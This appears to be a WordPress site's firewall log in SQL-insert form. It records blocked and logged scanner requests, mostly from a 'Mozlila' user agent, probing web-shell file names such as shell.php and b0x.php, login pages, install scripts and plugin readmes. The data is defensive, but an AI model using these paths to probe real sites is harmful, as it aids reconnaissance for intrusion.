(51947, 1712637274.912660, 1712637274.532800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(50505, 1711381138.741942, 1711381137.880600, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50466, 1711358969.153180, 1711358968.823400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/configs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmZpZ3MucGhw","category":"brute-force","ssl":1}'),
(50468, 1711358943.484400, 1711358943.011100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50467, 1711358954.763970, 1711358954.334200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/mini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21pbmkucGhw","category":"brute-force","ssl":1}'),
(50961, 1712207644.524163, 1712207644.097700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(50962, 1712207629.512587, 1712207629.159700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(50577, 1711655555.439984, 1711655554.892400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(51818, 1712406458.523001, 1712406458.083600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51999, 1712689341.703420, 1712689341.338500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(51911, 1712636899.737304, 1712636899.345100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(51935, 1712637470.852773, 1712637470.483900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/install.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luc3RhbGwucGhw","category":"brute-force","ssl":1}'),
(50810, 1712000687.770769, 1712000687.359400, '\0\0\0\0\0\0\0\0\0\0ÿÿ_ÓD', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50627, 1711731949.769812, 1711731949.411100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4veG1ybHBjLnBocA==","category":"brute-force","ssl":1}'),
(51892, 1712582122.829689, 1712582122.295000, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/wp/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","path":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","category":"discovery-and-probing","ssl":1}'),
(50701, 1711810304.563992, 1711810304.054400, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-consar.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnNhci5waHA=","category":"brute-force","ssl":1}'),
(50656, 1711731902.353807, 1711731901.991800, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51456, 0.000000, 1712320677.138343, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ|¥', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50969, 1712207496.864921, 1712207496.488500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/b0x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2IweC5waHA=","category":"brute-force","ssl":1}'),
(51457, 0.000000, 1712320679.012023, '\0\0\0\0\0\0\0\0\0\0ÿÿ½?âz', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50908, 1712082586.823881, 1712082586.208900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/configs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmZpZ3MucGhw","category":"brute-force","ssl":1}'),
(50867, 1712062416.635212, 1712062416.176900, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(50853, 1712062369.723069, 1712062369.346100, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(50896, 1712082241.503706, 1712082241.100900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(50854, 1712062368.592007, 1712062368.205600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50855, 1712062366.992896, 1712062366.523300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50892, 1712082269.491546, 1712082268.970000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50893, 1712082264.398051, 1712082263.973100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(50894, 1712082257.689679, 1712082256.895800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(50895, 1712082253.406572, 1712082252.954200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(51713, 1712368121.914925, 1712368121.572200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/super-forms/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.141', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1mb3Jtcy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1mb3Jtcy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
